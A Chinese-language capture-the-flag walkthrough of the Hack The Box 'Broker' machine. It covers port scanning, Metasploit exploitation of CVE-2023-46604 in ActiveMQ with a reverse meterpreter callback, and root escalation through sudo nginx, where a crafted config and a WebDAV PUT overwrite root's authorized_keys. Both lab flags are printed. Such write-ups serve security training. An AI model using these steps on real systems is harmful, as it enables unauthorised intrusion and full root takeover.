HTB：Broker[WriteUP]

连接至HTB服务器并启动靶机

1.Which open TCP port is running the ActiveMQ service?

使用fscan对靶机开放端口进行扫描

使用nmap对靶机开放端口进行脚本、服务信息扫描

2.What is the version of the ActiveMQ service running on the box?

3.What is the 2023 CVE-ID for a remote code execution vulnerability in the ActiveMQ version running on Broker?

4.What user is the ActiveMQ service running as on Broker?

尝试漏洞利用

5.Submit the flag located in the activemq user's home directory.

USER_FLAG：3aab16740303a25ccc63b7f6c91623f8

6.What is the full path of the binary that the activemq user can run as any other user with sudo?

再次从Meterpreter切换回shell

7.Which nginx directive can be used to define allowed WebDAV methods?

8.Which HTTP method is used to write files via the WebDAV protocol?

9.Which flag is used to set a custom nginx configuration by specifying a file?

10.Submit the flag located in the root user's home directory.

ROOT_FLAG：16de0aa36d6c7c4c7e55ea6fa167987a

尝试利用root权限的Nginx服务器getshell

在靶机或者在攻击机本地使用ssh-keygen生成一对密钥

利用一个变量存储root_ssh.pub内容

连接至HTB服务器并启动靶机

靶机IP：10.10.11.243

分配IP：10.10.16.6

1.Which open TCP port is running the ActiveMQ service?

使用fscan对靶机开放端口进行扫描

nmap -p- --min-rate=1500 -T4 {TARGET_IP} -oN nmap_result

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- --min-rate=1500 -T4 10.10.11.243 -oN nmap_result
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-20 07:59 EDT
Nmap scan report for 10.10.11.243
Host is up (0.084s latency).
Not shown: 65526 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open ssh
80/tcp    open http
1883/tcp open mqtt
5672/tcp open amqp
8161/tcp open patrol-snmp
42143/tcp open unknown
61613/tcp open unknown
61614/tcp open unknown
61616/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 38.09 seconds

使用nmap对靶机开放端口进行脚本、服务信息扫描

nmap -p`cat nmap_result | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//` -sCV {TARGET_IP}

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p`cat nmap_result | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//` -sCV 10.10.11.243
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-20 08:03 EDT
Nmap scan report for 10.10.11.243
Host is up (0.14s latency).

PORT      STATE SERVICE    VERSION
22/tcp    open ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp    open http       nginx 1.18.0 (Ubuntu)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-title: Error 401 Unauthorized
|_http-server-header: nginx/1.18.0 (Ubuntu)
1883/tcp open mqtt
| mqtt-subscribe:
|   Topics and their most recent payloads:
|     ActiveMQ/Advisory/Consumer/Topic/#:
|_    ActiveMQ/Advisory/MasterBroker:
5672/tcp open amqp?
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
|     AMQP
|     AMQP
|     amqp:decode-error
|_    7Connection from client using unsupported AMQP attempted
8161/tcp open http       Jetty 9.4.39.v20210325
|_http-title: Error 401 Unauthorized
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-server-header: Jetty(9.4.39.v20210325)
42143/tcp open tcpwrapped
61613/tcp open stomp      Apache ActiveMQ
| fingerprint-strings:
|   HELP4STOMP:
|     ERROR
|     content-type:text/plain
|     message:Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
|     org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
|     org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
|     org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
|     org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_    java.lang.Thread.run(Thread.java:750)
61614/tcp open http       Jetty 9.4.39.v20210325
|_http-server-header: Jetty(9.4.39.v20210325)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title.
61616/tcp open apachemq   ActiveMQ OpenWire transport
| fingerprint-strings:
|   NULL:
|     ActiveMQ
|     TcpNoDelayEnabled
|     SizePrefixDisabled
|     CacheSize
|     ProviderName
|     ActiveMQ
|     StackTraceEnabled
|     PlatformDetails
|     Java
|     CacheEnabled
|     TightEncodingEnabled
|     MaxFrameSize
|     MaxInactivityDuration
|     MaxInactivityDurationInitalDelay
|     ProviderVersion
|_    5.15.15
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5672-TCP:V=7.94SVN%I=7%D=10/20%Time=6714F182%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,89,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\0\0\0\x19\x02\0\0\0\0S\
SF:x10\xc0\x0c\x04\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0`\x02\0\0\0\0S\x18\xc0S
SF:\x01\0S\x1d\xc0M\x02\xa3\x11amqp:decode-error\xa17Connection\x20from\x2
SF:0client\x20using\x20unsupported\x20AMQP\x20attempted")%r(HTTPOptions,89
SF:,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\0\0\0\x19\x02\0\0\0\0S\x10\xc0\x0c\x04
SF:\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0`\x02\0\0\0\0S\x18\xc0S\x01\0S\x1d\xc0
SF:M\x02\xa3\x11amqp:decode-error\xa17Connection\x20from\x20client\x20usin
SF:g\x20unsupported\x20AMQP\x20attempted")%r(RTSPRequest,89,"AMQP\x03\x01\
SF:0\0AMQP\0\x01\0\0\0\0\0\x19\x02\0\0\0\0S\x10\xc0\x0c\x04\xa1\0@p\0\x02\
SF:0\0`\x7f\xff\0\0\0`\x02\0\0\0\0S\x18\xc0S\x01\0S\x1d\xc0M\x02\xa3\x11am
SF:qp:decode-error\xa17Connection\x20from\x20client\x20using\x20unsupporte
SF:d\x20AMQP\x20attempted")%r(RPCCheck,89,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\
SF:0\0\0\x19\x02\0\0\0\0S\x10\xc0\x0c\x04\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0
SF:`\x02\0\0\0\0S\x18\xc0S\x01\0S\x1d\xc0M\x02\xa3\x11amqp:decode-error\xa
SF:17Connection\x20from\x20client\x20using\x20unsupported\x20AMQP\x20attem
SF:pted")%r(DNSVersionBindReqTCP,89,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\0\0\0\
SF:x19\x02\0\0\0\0S\x10\xc0\x0c\x04\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0`\x02\
SF:0\0\0\0S\x18\xc0S\x01\0S\x1d\xc0M\x02\xa3\x11amqp:decode-error\xa17Conn
SF:ection\x20from\x20client\x20using\x20unsupported\x20AMQP\x20attempted")
SF:%r(DNSStatusRequestTCP,89,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\0\0\0\x19\x02
SF:\0\0\0\0S\x10\xc0\x0c\x04\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0`\x02\0\0\0\0
SF:S\x18\xc0S\x01\0S\x1d\xc0M\x02\xa3\x11amqp:decode-error\xa17Connection\
SF:x20from\x20client\x20using\x20unsupported\x20AMQP\x20attempted")%r(SSLS
SF:essionReq,89,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\0\0\0\x19\x02\0\0\0\0S\x10
SF:\xc0\x0c\x04\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0`\x02\0\0\0\0S\x18\xc0S\x0
SF:1\0S\x1d\xc0M\x02\xa3\x11amqp:decode-error\xa17Connection\x20from\x20cl
SF:ient\x20using\x20unsupported\x20AMQP\x20attempted")%r(TerminalServerCoo
SF:kie,89,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\0\0\0\x19\x02\0\0\0\0S\x10\xc0\x
SF:0c\x04\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0`\x02\0\0\0\0S\x18\xc0S\x01\0S\x
SF:1d\xc0M\x02\xa3\x11amqp:decode-error\xa17Connection\x20from\x20client\x
SF:20using\x20unsupported\x20AMQP\x20attempted");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port61613-TCP:V=7.94SVN%I=7%D=10/20%Time=6714F17D%P=x86_64-pc-linux-gnu
SF:%r(HELP4STOMP,27F,"ERROR\ncontent-type:text/plain\nmessage:Unknown\x20S
SF:TOMP\x20action:\x20HELP\n\norg\.apache\.activemq\.transport\.stomp\.Pro
SF:tocolException:\x20Unknown\x20STOMP\x20action:\x20HELP\n\tat\x20org\.ap
SF:ache\.activemq\.transport\.stomp\.ProtocolConverter\.onStompCommand$Pr
SF:otocolConverter\.java:258$\n\tat\x20org\.apache\.activemq\.transport\.
SF:stomp\.StompTransportFilter\.onCommand$StompTransportFilter\.java:85$
SF:\n\tat\x20org\.apache\.activemq\.transport\.TransportSupport\.doConsume
SF:$TransportSupport\.java:83$\n\tat\x20org\.apache\.activemq\.transport
SF:\.tcp\.TcpTransport\.doRun$TcpTransport\.java:233$\n\tat\x20org\.apac
SF:he\.activemq\.transport\.tcp\.TcpTransport\.run$TcpTransport\.java:215
SF:$\n\tat\x20java\.lang\.Thread\.run$Thread\.java:750$\n\0\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port61616-TCP:V=7.94SVN%I=7%D=10/20%Time=6714F17D%P=x86_64-pc-linux-gnu
SF:%r(NULL,140,"\0\0\x01<\x01ActiveMQ\0\0\0\x0c\x01\0\0\x01\*\0\0\0\x0c\0\
SF:x11TcpNoDelayEnabled\x01\x01\0\x12SizePrefixDisabled\x01\0\0\tCacheSize
SF:\x05\0\0\x04\0\0\x0cProviderName\t\0\x08ActiveMQ\0\x11StackTraceEnabled
SF:\x01\x01\0\x0fPlatformDetails\t\0\x04Java\0\x0cCacheEnabled\x01\x01\0\x
SF:14TightEncodingEnabled\x01\x01\0\x0cMaxFrameSize\x06\0\0\0\0\x06@\0\0\0
SF:\x15MaxInactivityDuration\x06\0\0\0\0\0\0u0\0\x20MaxInactivityDurationI
SF:nitalDelay\x06\0\0\0\0\0\0'\x10\0\x0fProviderVersion\t\0\x075\.15\.15");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.82 seconds

由扫描结果可见靶机61616端口托管运行ActiveMQ服务器

2.What is the version of the ActiveMQ service running on the box?

在上文nmap扫描结果可见ActiveMQ服务器版本：5.15.15

或者直接使用浏览器访问靶机URL：http://{TARGET_IP}:61616

3.What is the 2023 CVE-ID for a remote code execution vulnerability in the ActiveMQ version running on Broker?

在vuldb对该服务器以及版本进行CVE漏洞搜索

往下拉可以看到ActiveMQ5.15.15版本受CVE-2023-46604漏洞影响

4.What user is the ActiveMQ service running as on Broker?

在CNNVD对该漏洞进行相关信息查询，可知该漏洞可以直接getshell

启动Metasploit

msfconsole

搜索该漏洞编号

msf6 > search CVE-2023-46604

使用该Exp模块

msf6 > use exploit/multi/misc/apache_activemq_rce_cve_2023_46604

列出该模块的可填选项

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > show options

尝试漏洞利用

在此模块中，我们需要填写的选项为：LHOST、LPORT、RHOSTS、SRVHOST、PAYLOAD

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > set LHOST 10.10.16.6
LHOST => 10.10.16.6

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > set lport 1425
lport => 1425
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > set RHOSTS 10.10.11.243
RHOSTS => 10.10.11.243

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > set SRVHOST 10.10.16.6
SRVHOST => 10.10.16.6

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_http
PAYLOAD => cmd/linux/http/x64/meterpreter_reverse_http

输入run或exploit开始运行该Exp模块

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit

[*] Started HTTP reverse handler on http://10.10.16.6:1425
[*] 10.10.11.243:61616 - Running automatic check ("set AutoCheck false" to disable)
[+] 10.10.11.243:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.15
[*] 10.10.11.243:61616 - Using URL: http://10.10.16.6:8080/8PbbHPQ2yq
[*] 10.10.11.243:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] 10.10.11.243:61616 - Sent ClassPathXmlApplicationContext configuration file.
ps
[!] http://10.10.16.6:1425 handling request from 10.10.11.243; (UUID: zz3u79fg) Without a database connected that payload UUID tracking will not work!
[*] http://10.10.16.6:1425 handling request from 10.10.11.243; (UUID: zz3u79fg) Redirecting stageless connection from /MSMT6wDicVqtE6sRygarOA3kv-N8oKle3FHjO_jRYeNTUck2edy26hRu432A97PjamyCMabbOBwnUZ6MJq6wGCXD8jIrBQ-C62VXNxbIFGoaPg with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0'
[!] http://10.10.16.6:1425 handling request from 10.10.11.243; (UUID: zz3u79fg) Without a database connected that payload UUID tracking will not work!
[*] http://10.10.16.6:1425 handling request from 10.10.11.243; (UUID: zz3u79fg) Attaching orphaned/stageless session...
[!] http://10.10.16.6:1425 handling request from 10.10.11.243; (UUID: zz3u79fg) Without a database connected that payload UUID tracking will not work!
[*] 10.10.11.243:61616 - Server stopped.
[*] Meterpreter session 1 opened (10.10.16.6:1425 -> 10.10.11.243:56034) at 2024-10-20 09:31:29 -0400

meterpreter > ps

Process List
============

PID   PPID Name       Arch    User      Path
---   ---- ----       ----    ----      ----
946   1     java       x86_64 activemq /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java
1460 1     BnrCpBMJa x86_64 activemq /opt/apache-activemq-5.15.15/bin/BnrCpBMJa

将Meterpreter切换成shell

meterpreter > shell

查看当前用户

whoami

meterpreter > shell
Process 1483 created.
Channel 2 created.
whoami
activemq

由回显可见，ActiveMQ服务以activemq用户运行

5.Submit the flag located in the activemq user's home directory.

查找user_flag位置

find / -name 'user.txt' 2>/dev/null

查看user_flag内容

cat /home/activemq/user.txt

find / -name 'user.txt' 2>/dev/null
/home/activemq/user.txt
cat /home/activemq/user.txt
3aab16740303a25ccc63b7f6c91623f8

USER_FLAG：3aab16740303a25ccc63b7f6c91623f8

6.What is the full path of the binary that the activemq user can run as any other user with `sudo`?

从shell切换回Meterpreter

exit

尝试一键获取系统权限

meterpreter > getsystem

meterpreter > getsystem
[-] The "getsystem" command requires the "priv" extension to be loaded (run: `load priv`)

提示需要加载priv模块

meterpreter > load priv

meterpreter > load priv
Loading extension priv...
[-] Failed to load extension: The "priv" extension is not supported by this Meterpreter type (x64/linux)
[-] The "priv" extension is supported by the following Meterpreter payloads:
[-] - windows/x64/meterpreter*
[-] - windows/meterpreter*

只有Windows的payload支持一键提权，由于我们这次打的是Linux靶机所以只能手动提权

再次从Meterpreter切换回shell

meterpreter > shell

提升成tty_shell

script -c /bin/bash -q /dev/null

查看当前用户可sudo运行的命令或文件

activemq@broker:/opt/apache-activemq-5.15.15/bin$ sudo -l

activemq@broker:/opt/apache-activemq-5.15.15/bin$ sudo -l
sudo -l
activemq@broker:/opt/apache-activemq-5.15.15/bin$ Matching Defaults entries for activemq on broker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User activemq may run the following commands on broker:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx

由回显可见，二进制文件：/usr/sbin/nginx可被activemq用户sudo执行

7.Which nginx directive can be used to define allowed WebDAV methods?

直接把这个问题喂给豆包

由回答可知，在Nginx中dav_methods指令可以用来定义WebDAV方法

在 Nginx 中，“dav_methods”指令用于指定允许的 WebDAV 方法。

WebDAV（Web Distributed Authoring and Versioning）是对 HTTP 协议的扩展，允许用户通过 HTTP 进行远程文件管理操作，如创建、删除、复制、移动文件等。

“dav_methods”指令可以设置允许的 WebDAV 方法，比如可以设置为“PUT”“DELETE”“MKCOL”“COPY”“MOVE”等不同的方法组合，以控制服务器对特定路径下的 WebDAV 请求所允许执行的操作。如果没有明确设置该指令，Nginx 可能会使用默认的 WebDAV 方法集。

例如，“dav_methods PUT DELETE;”表示允许在特定的 Nginx 配置上下文中执行 PUT 和 DELETE 这两种 WebDAV 方法。

8.Which HTTP method is used to write files via the WebDAV protocol?

还是直接喂给豆包

到了这里提权思路已经明显，将Nginx服务器运行目录设置在root_flag同目录即可

后期还可以通过WebDAV写入文件可以getshell，做到稳定的root_shell访问

WebDAV（Web - Based Distributed Authoring and Versioning）是超文本传输协议（HTTP）的一种扩展。它允许用户通过HTTP协议对服务器上的文件进行远程操作，就好像在本地文件系统中操作文件一样，包括创建、删除、移动、复制文件和文件夹以及修改文件的属性等，还支持多个用户对文件进行协作编辑，不同用户可以同时访问和修改服务器上的文件，并且可以跟踪文件的版本变化，方便团队协作。它基于HTTP协议，在HTTP协议基础上定义了一些新的方法和头信息以实现文件操作功能，例如PUT方法可上传文件，DELETE方法可删除文件，MKCOL方法可创建文件夹等，同时用一些自定义头信息传递文件属性信息如文件大小、创建时间、修改时间等。它应用于企业内部文件共享，员工可通过它访问公司服务器上共享文件进行操作；用于内容管理系统（CMS），允许管理员和作者对网站内容进行远程管理和更新；用于移动设备与服务器同步，用户可通过移动设备应用程序使用它与服务器同步联系人、日历、文档等信息。

9.Which flag is used to set a custom `nginx` configuration by specifying a file?

查看Nginx帮助手册

activemq@broker:/opt/apache-activemq-5.15.15/bin$ sudo /usr/sbin/nginx -h

activemq@broker:/opt/apache-activemq-5.15.15/bin$ sudo /usr/sbin/nginx -h
sudo /usr/sbin/nginx -h
nginx version: nginx/1.18.0 (Ubuntu)
Usage: nginx [-?hvVtTq] [-s signal] [-c filename] [-p prefix] [-g directives]

Options:
-?,-h         : this help
-v            : show version and exit
-V            : show version and configure options then exit
-t            : test configuration and exit
-T            : test configuration, dump it and exit
-q            : suppress non-error messages during configuration testing
-s signal     : send signal to a master process: stop, quit, reopen, reload
-p prefix     : set prefix path (default: /usr/share/nginx/)
-c filename   : set configuration file (default: /etc/nginx/nginx.conf)
-g directives : set global directives out of configuration file

由回显可见，-c选项用于指定nginx配置文件

10.Submit the flag located in the root user's home directory.

activemq@broker:/opt/apache-activemq-5.15.15/bin$ cd /
cd /

activemq@broker:/$ ls
bin dev home lib32 libx32 media opt root sbin sys usr
boot etc lib lib64 lost+found mnt proc run srv tmp var
ls
activemq@broker:/$ cd root
cd root
bash: cd: root: Permission denied

在网上可以找到Nginx的conf模板，将服务器目录设置在：/root

user root;
events {
    worker_connections 666;
}
http {
    server {
        listen 6666;
        root /root;
        autoindex on;
    }
}

本地开启http服务并将该conf上传至靶机

python -m http.server 7777

wget http://{NATIVE_IP}:{NATIVE_PORT}/temp.conf -O temp.conf

启用上传的配置

activemq@broker:/opt/apache-activemq-5.15.15/bin$ sudo /usr/sbin/nginx -c /opt/apache-activemq-5.15.15/bin/temp.conf

activemq@broker:/opt/apache-activemq-5.15.15/bin$ sudo /usr/sbin/nginx -c /opt/apache-activemq-5.15.15/bin/temp.conf
<nginx -c /opt/apache-activemq-5.15.15/bin/temp.conf

查看网络连接，可以看到6666端口已经在监听

activemq@broker:/opt/apache-activemq-5.15.15/bin$ ss -tlpn

攻击机尝试直接获取/root/root.txt文件内容

curl -v http://10.10.11.243:6666/root.txt

┌──(kali㉿kali)-[~]
└─$ curl -v http://10.10.11.243:6666/root.txt
* Trying 10.10.11.243:6666...
* Connected to 10.10.11.243 (10.10.11.243) port 6666
* using HTTP/1.x
> GET /root.txt HTTP/1.1
> Host: 10.10.11.243:6666
> User-Agent: curl/8.10.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Server: nginx/1.18.0 (Ubuntu)
< Date: Sun, 20 Oct 2024 14:45:28 GMT
< Content-Type: text/plain
< Content-Length: 33
< Last-Modified: Sun, 20 Oct 2024 11:21:25 GMT
< Connection: keep-alive
< ETag: "6714e7b5-21"
< Accept-Ranges: bytes
<
16de0aa36d6c7c4c7e55ea6fa167987a
* Connection #0 to host 10.10.11.243 left intact

ROOT_FLAG：16de0aa36d6c7c4c7e55ea6fa167987a

尝试利用root权限的Nginx服务器getshell

修改conf文件，开启通过WebDAV方法允许使用PUT上传(这里注意更换监听端口)

user root;
events {
    worker_connections 666;
}
http {
    server {
        listen 3333;
        root /;
        autoindex on;
        dav_methods PUT;
    }
}

重新将conf文件上传至靶机，并启用该配置文件

再次查看网络接口，3333、6666接口皆正常监听状态

在靶机或者在攻击机本地使用ssh-keygen生成一对密钥

activemq@broker:/tmp$ ssh-keygen
Generating public/private rsa key pair.
ssh-keygen
Enter file in which to save the key (/home/activemq/.ssh/id_rsa): ./root_ssh
./root_ssh
Enter passphrase (empty for no passphrase):

Enter same passphrase again:
Your identification has been saved in ./root_ssh

Your public key has been saved in ./root_ssh.pub
The key fingerprint is:
SHA256:mxcbrkJlvwTbX2D+gjTAdXjZlDvaIIBTizxw/L90KYs activemq@broker
The key's randomart image is:
+---[RSA 3072]----+
|    ...o. . +.. |
|     ++...o + o |
|      ++.o o   . |
|       .B . + o |
|       oSBo+ * . |
|      . .+X+= o |
|     . o=+X o   |
|      . Eo= o . |
|       ..    .   |
+----[SHA256]-----+
activemq@broker:/tmp$ ls
root_ssh root_ssh.pub

root用户authorized_keys默认位置：/root/.ssh/authorized_keys

利用Nginx的上传方法，将：root_ssh.pub文件覆盖掉：/root/.ssh/authorized_keys

在 SSH（Secure Shell）中，“authorized_keys”是一个重要的文件，通常位于用户主目录下的“.ssh”文件夹中。

这个文件用于存储授权的 SSH 公钥。当客户端尝试使用 SSH 连接到服务器时，服务器会检查客户端提供的公钥是否存在于目标用户的“authorized_keys”文件中。如果存在，并且配置正确，服务器将允许客户端进行连接，而无需输入密码（如果配置为基于密钥的认证方式）。

每个公钥在“authorized_keys”文件中占据一行，通常以特定的格式（如“ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCy...”）开头，后面跟着公钥的具体内容和一些可选的注释信息。

通过管理“authorized_keys”文件，可以控制哪些用户可以通过 SSH 连接到特定的服务器账户，以及实现无密码登录、自动化脚本执行等功能，同时也有助于提高系统的安全性，因为可以避免使用容易被破解的密码认证方式。

利用一个变量存储root_ssh.pub内容

activemq@broker:/tmp$ key=$(cat root_ssh.pub)

将authorized_keys文件覆盖

activemq@broker:/tmp$ curl -X PUT localhost:3333/root/.ssh/authorized_keys -d $key

在靶机activemq用户通过SSH私钥连接至靶机root用户

activemq@broker:/tmp$ ssh -i root_ssh root@localhost

activemq@broker:/tmp$ ssh -i root_ssh root@localhost
ssh -i root_ssh root@localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.ED25519 key fingerprint is SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY.

This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
yes
Warning: Permanently added 'localhost' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management:     https://landscape.canonical.com
* Support:        https://ubuntu.com/advantage

System information as of Sun Oct 20 03:25:13 PM UTC 2024

System load:           0.0
Usage of /:            72.0% of 4.63GB
Memory usage:          13%
Swap usage:            0%
Processes:             164
Users logged in:       0
IPv4 address for eth0: 10.10.11.243
IPv6 address for eth0: dead:beef::250:56ff:feb9:271e

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

root@broker:~# whoami
whoami
root
root@broker:~# ls
ls
cleanup.sh root.txt